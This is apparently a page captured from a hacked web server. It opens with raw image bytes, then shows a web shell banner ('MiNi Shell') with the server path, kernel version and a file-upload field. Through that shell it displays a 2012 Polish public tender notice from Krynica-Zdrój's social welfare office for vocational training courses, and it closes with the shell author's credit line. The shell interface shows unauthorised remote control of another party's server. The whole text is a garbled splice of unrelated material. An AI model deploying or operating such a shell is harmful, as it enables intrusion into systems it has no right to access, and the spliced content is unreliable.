JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/216059-N-2012.html

<p class="kh_header"><b>Krynica-Zdrój: Kompleksowe zorganizowanie i przeprowadzenie 
kursów zawodowych</b><br>
<b>Numer ogłoszenia: 216059 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Krynicy-Zdroju , ul. Kraszewskiego 37, 33-380 Krynica-Zdrój, woj. małopolskie, tel. 18 471 53 68, faks 18 471 0 771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opskrynica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zorganizowanie i przeprowadzenie 
kursów zawodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na kompleksowym zorganizowaniu i przeprowadzeniu szkoleń zawodowych w toku projektu Czas na zwiększenie aktywności zawodowej w Gminie Krynica - Zdrój realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2.	Zamówienie realizowane będzie w formie kursów w 4 następujących zakresach tematycznych:
1)	Kurs pomocnika elektryka - szkolenie na uprawnienia SEP do 1 kV - celem kursu pomocnika elektryka - szkolenia na uprawnienia elektryczne: świadectwo kwalifikacji E do 1 kV jest przygotowanie do zdobycia uprawnień do pracy w zakresie eksploatacji urządzeń, instalacji i sieci energetycznych do 1 kV. Program kursu musi zawierać zakres informacji niezbędnych do złożenia egzaminu przed Komisją Kwalifikacyjną i uzyskanie wymaganych ustawą kwalifikacji z zakresu eksploatacji urządzeń, instalacji i sieci energetycznych do 1 kV. Kurs pomocnika elektryka - szkolenia na uprawnienia elektryczne: świadectwo kwalifikacji E do 1 kV, odbywać się winien w jednej grupie (liczba uczestników - 4 osoby) i musi obejmować 30 godzin zegarowych. Po przeprowadzeniu kursu Wykonawca zobowiązany jest zorganizować egzamin przed Komisją Kwalifikacyjną.
	Zakres tematyczny kursu musi obejmować co najmniej następujące zagadnienia:
-	podstawy elektrotechniki,
-	warunki techniczne budowy urządzeń elektroenergetycznych,
-	eksploatacja urządzeń elektroenergetycznych,
-	zasady organizacji bezpiecznej pracy przy urządzeniach elektroenergetycznych,
-	zasady ratowania porażonych prądem elektrycznym oraz wytyczne w sprawie udzielania pomocy przedlekarskiej,
-	ochrona przeciwpożarowa.
2)	Kurs florystyczny - celem kursu jest przygotowanie uczestników do pracy w zawodzie florysta. Podczas zajęć uczestnicy mają nabyć wiedzę oraz praktyczne umiejętności z zakresu wykonywania kompozycji florystycznych (z kwiatów ciętych, suszonych, sztucznych), pielęgnacji kwiatów doniczkowych i ciętych, wykorzystania materiałów i narzędzi stosowanych w pracowniach florystycznych. W ramach zajęć uczestnicy mają wykonywać m.in. bukiety ślubne, wiązanki okolicznościowe, żałobne, wianki, stroiki, dekoracje pomieszczeń. Zakres tematyczny kursu musi obejmować co najmniej następujące zagadnienia:
-	Kompozycje florystyczne: historia dekoracji roślinnych; prezentacja reprodukcji obrazów, zdjęć, rycin i rysunków z motywami kwiatowymi; kwiaty w dekoracji architektonicznej; martwe natury; symbolika kwiatów.
-	Pielęgnacja kwiatów doniczkowych i ciętych: omówienie zasad pielęgnacji kwiatów doniczkowych; omówienie zasad pielęgnacji kwiatów ciętych.
-	Materiały, narzędzia dekoratorskie - zastosowanie: zapoznanie się z materiałami, narzędziami, rekwizytami florystycznymi; zapoznanie się z zasadami bezpieczeństwa i higieny pracy przy wykonywaniu kompozycji.
-	Kompozycje roślinne z kwiatów ciętych, suszonych - style: kompozycja i jej rodzaje; ćwiczenia praktyczne: układanie kompozycji w naczyniu.
-	Kompozycje kwiatowe-stroiki okolicznościowe - ćwiczenia praktyczne: wykonanie bukietu ślubnego; wykonanie wiązanki okolicznościowej; wykonanie wiązanki żałobnej; wykonanie wianka.
W kursie uczestniczyć będzie 6 osób. Kurs obejmować musi 40 godzin zegarowych.
3)	Kurs asystent do spraw księgowości - celem kursu jest przygotowanie uczestników do pracy na stanowisku asystent księgowości. Zakres tematyczny kursu musi obejmować co najmniej następujące zagadnienia:
-	Podstawowe pojęcia i zasady w rachunkowości,
-	Ustawa o rachunkowości: polityka rachunkowości, wewnętrzne regulacje, dokumentacja księgowa, obieg dokumentów.
-	Ogólne zasady i wymogi prowadzenia ewidencji na kontach.
-	Ewidencja zdarzeń gospodarczych: konta księgowe jako podstawowe narzędzie rejestracji zdarzeń, plan kont - omówienie zasady tworzenia, klasyfikacja zdarzeń gospodarczych.
-	Księgi rachunkowe: księga przychodów i rozchodów - zasady prowadzenia.
-	Aktywa i pasywa: aktywa (zakres przedmiotowy, ewidencja zdarzeń - zakup, amortyzacja, sprzedaż), rzeczowe trwałe, niematerialne i prawne, długoterminowe aktywa finansowe, rzeczowe obrotowe (zapasy, obrót materiałowy i towarowy, rozrachunki, aktywa finansowe krótkoterminowe), pasywa (kapitał własny, kapitał obcy: rezerwy i zobowiązania).
-	Podatki: podatek dochodowy od osób fizycznych, podatek dochodowy od osób prawnych, podatek od towarów i usług (rozrachunki, faktury VAT, ewidencja księgowa, deklaracja VAT-7), inne (np. cywilno - prawne, lokalne).
-	Wynagrodzenia:  tworzenie listy płac, tworzenie list wypłat, rozliczenia z Zakładem Ubezpieczeń Społecznych, rozliczenia z Urzędem Skarbowym, rozliczenia z pracownikami.
-	Obrót pieniężny (dokumentowanie i ewidencja), operacje gotówkowe, operacje bezgotówkowe.
-	Obrót towarowy i materiałowy (ewidencja zakupów, rozliczenie zakupów, rozchód materiałów, obrót towarowy, ewidencja sprzedaży).
-	Rozrachunki (klasyfikacja, wycena i ewidencja): z dostawcami,  z odbiorcami, z pracownikami, pozostałe (np. z ZUS, publiczno - prawne).
-	Podstawowe deklaracje i dokumenty zgłaszane do ZUS.
-	Podstawowe deklaracje PIT i CIT.
-	Rachunek zysków i strat (przychód, koszt, wynik a podstawa opodatkowania).
-	Sprawozdanie finansowe jednostki: istota i charakter, składniki (bilans, rachunek zysków i strat, informacja dodatkowa i objaśnienia, zestawienie zmian w kapitale, rachunek przepływów pieniężnych).
-	Praktyczne wprowadzenie do komputerowego programu finansowo-księgowego. Zapoznanie się z głównymi funkcjami programu. Przykładowe wprowadzanie dokumentów do systemu finansowo-księgowego.
W kursie uczestniczyć będą 3 osoby. Kurs obejmować musi 42 godziny zegarowe.
4)	Kurs stylizacji i wizażu - celem kursu jest przygotowanie uczestników do pracy w zawodzie stylistka-wizażystka, nabycie praktycznych umiejętności wykonywania makijażu, elementów charakteryzacji oraz makijażu fantazyjnego, zdobycie wiedzy z zakresu teorii barw, dobierania kolorów do typu urody, korekcji defektów i technik makijażu. Zakres tematyczny kursu musi obejmować co najmniej następujące zagadnienia:
-	Wiadomości wstępne: wyposażenie do wykonywania makijażu, zasady makijażu.
-	Przygotowanie do wykonywania makijażu: analiza kolorystyczna twarzy, stylizacja twarzy i makijażu, wykonywanie projektów.
-	Elementy makijażu: makijaż korekcyjny, makijaż oczu, makijaż policzków, makijaż ust.
-	Rodzaje makijażu: makijaż dzienny, wieczorowy, ślubny, fantazyjny, studyjny.
-	Elementy stylizacji: stylizacja postaci, stylizacja fryzur, stylizacja paznokci.
W kursie uczestniczyć będzie 5 osób. Kurs obejmować musi 40 godzin zegarowych.
3.	Zamawiający nie dopuszcza możliwości prowadzenia kursów metodą e- learning.
4.	Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest do zorganizowania i przeprowadzenia kursów na terenie miasta Krynicy - Zdrój w odległości do 4 km od Ośrodka Pomocy Społecznej w Krynicy - Zdroju. Sale szkoleniowe oraz wykorzystywany sprzęt muszą spełniać wszelkie wymogi w zakresie BHP i p. poż. W pobliżu sal szkoleniowych musi być zapewnione zaplecze sanitarne dla uczestników szkoleń (toalety). Pomieszczenia, w których będą odbywać się kursy powinny być oznakowane materiałami promocyjnymi projektu Czas na zwiększenie aktywności zawodowej w Gminie Krynica - Zdrój, a także informacjami o współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego wraz z logotypami Programu Operacyjnego Kapitał Ludzki.
5.	Zajęcia powinny odbywać się od poniedziałku do piątku z wyłączeniem świąt w godzinach od 11:15 do 16:15 w poniedziałki i czwartki oraz od 8:00 do 16:00 w pozostałych dniach tygodnia zgodnie ze szczegółowym harmonogramem kursów opracowanym w porozumieniu z Zamawiającym. Kurs: florystyczny, asystenta do spraw księgowości oraz stylizacji i wizażu nie może odbywać się równocześnie w tym samym terminie.
6.	Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji szczegółowy harmonogram szkoleń z podaniem dat, miejsca i czasu realizacji jak również szczegółowy program kursów, który powinien zawierać plan nauczania wraz z zakresem tematycznym zajęć oraz sposobem organizacji kursu w terminie do 3 dni od dnia zawarcia umowy.
7.	Wykonawca winien przygotować i przekazać każdemu Uczestnikowi kursów materiały dydaktyczne obejmujące zagadnienia tematyczne poruszane na zajęciach, a także długopisy i notatniki przy czym materiały muszą zawierać informację, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz posiadać logotypy Programu Operacyjnego Kapitał Ludzki.
8.	Wykonawca przekaże, uprzednio uzgodnionych i zatwierdzony przez Zamawiającego, harmonogram zajęć każdemu Uczestnikowi szkolenia.
9.	Wykonawca zobowiązany jest do sporządzenia list obecności Uczestników kursów, każdego dnia rozpoczynając zajęcia oraz do zawiadomienia Zamawiającego w przypadku stwierdzenia nieobecności któregokolwiek z Uczestników kursu figurującego na liście oraz do prowadzenia dziennika zajęć, a w ostatnim dniu zajęć winien przeprowadzić wśród Uczestników kursów ankiety oceniające przebieg zajęć. 
10.	Wykonawca zobowiązany jest w każdy dzień kursów zapewnić wyżywienie obejmujące: przerwę kawową (kawa, herbata, mleko, cukier, zimne napoje - soki, woda mineralna, owoce, ciasteczka dla każdego Uczestnika) oraz ok. godz. 13 przygotować i wydać ciepły dwudaniowy posiłek w formie obiadu (zupa + drugie danie) wraz z deserem dla każdego Uczestnika.
11.	Wykonawca po przeprowadzonym kursie przekaże Zamawiającemu oryginalne listy obecności, oryginalne dzienniki zajęć, potwierdzenie korzystania z cateringu, potwierdzenie odbioru materiałów dydaktycznych, jeden egzemplarz materiałów dydaktycznych przekazywany Uczestnikowi kursu oraz ankiety (ewaluacyjne) porównawcze, a także oryginały Zaświadczeń i Certyfikatów oraz kopie ich potwierdzone za zgodność z oryginałem.
12.	Wykonawca zapewni do przeprowadzenia kursów osoby posiadające wymagane kwalifikacje i doświadczenie. Wskazane do realizacji zamówienia osoby muszą posiadać wykształcenie wyższe oraz doświadczenie w prowadzeniu min. jednego szkolenia/kursy w danym zakresie tematycznym. Wykonawca w terminie do 3 dni od dnia zawarcia umowy przedłoży Zamawiającemu wykaz osób, które będą prowadziły kurs wraz z ich życiorysem zawodowym oraz zdobytymi dyplomami.
13.	Wykonawca zobowiązany jest do współpracy z Zamawiającym w zakresie realizacji przedmiotu zamówienia oraz do uwzględnienia wszystkich uwag i wskazówek Zamawiającego. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad prowadzonym kursem na każdym jego etapie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawcy wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej po jednej usłudze polegającej na przeprowadzeniu szkolenia/kursu w ramach każdego z zakresów tematycznych ujętych w niniejszym postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:

1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy;
2)	konieczności zmiany terminu realizacji zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę lub Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opskrynica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Krynicy - Zdroju,
ul. Kraszewskiego 37,
33-380 Krynica - Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej w Krynicy - Zdroju,
ul. Kraszewskiego 37,
33-380 Krynica - Zdrój, 
pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Czas na zwiększenie aktywności zawodowej w Gminie Krynica-Zdrój 
Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Priorytet VII Promocja integracji społecznej 
Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji
Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Zamawiający nie przewiduje zawarcia umowy ramowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com